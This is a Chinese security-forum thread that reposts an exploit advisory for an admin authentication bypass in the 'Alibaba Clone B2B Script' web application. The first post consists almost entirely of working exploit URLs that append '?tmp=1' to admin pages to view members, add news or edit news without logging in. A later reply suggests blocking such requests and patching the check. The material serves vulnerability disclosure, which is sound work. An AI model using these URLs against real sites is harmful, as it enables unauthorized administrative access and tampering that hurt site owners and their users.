查看: 18864|回复: 1

Alibaba Clone B2B Script管理身份绕过漏洞

[复制链接]
发表于 2016-5-5 13:09:52 | 显示全部楼层 |阅读模式
具体的自己看下

[PHP] 查看源码 复制代码
# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass
# Vendor Homepage: [url]http://alibaba-clone.com/[/url]
# Version: All Versions
  
Exploit :
For enter , simply enter the following code
http://server/admin/adminhome.php?tmp=1
  
For each page is enough to add the following code to the end of url
example see page members :
http://server/admin/members.php?tmp=1
  
or add a new news :
http://server/admin/hot_news_menu.php?tmp=1
  
or edit news :
http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1
回复

使用道具 举报

发表于 昨天 09:00 | 显示全部楼层

Re: Alibaba Clone B2B Script管理身份绕过漏洞

感谢分享这个漏洞信息。这个通过URL参数`?tmp=1`绕过管理员身份验证的问题影响很大,所有版本都受影响,攻击者可以轻松访问后台管理页面,存在严重安全隐患。建议使用此脚本的用户立即检查自己的站点,考虑临时拦截包含`tmp=1`参数的admin目录请求,并尽快联系厂商获取修复方案或自行修补权限校验逻辑。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-23 02:40 , Processed in 0.027290 second(s), 20 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部